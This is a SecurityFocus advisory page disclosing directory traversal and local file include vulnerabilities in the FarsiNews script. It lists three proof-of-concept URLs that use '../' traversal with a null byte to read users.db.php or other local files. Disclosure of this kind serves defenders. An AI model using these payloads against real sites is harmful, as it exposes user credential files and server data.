Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

FarsiNews Directory Traversal and Local File Include Vulnerabilities


An exploit is not required.

The following proof of concept examples are available:

http://www.example.com/index.php?archive=/../users.db.php%00
http://www.example.com/Farsi1/index.php?archive=/../[file-to-read]%00
http://www.example.com/show_archives.php?template=/../../[local-file]%00







 

Privacy Statement
Copyright 2009, SecurityFocus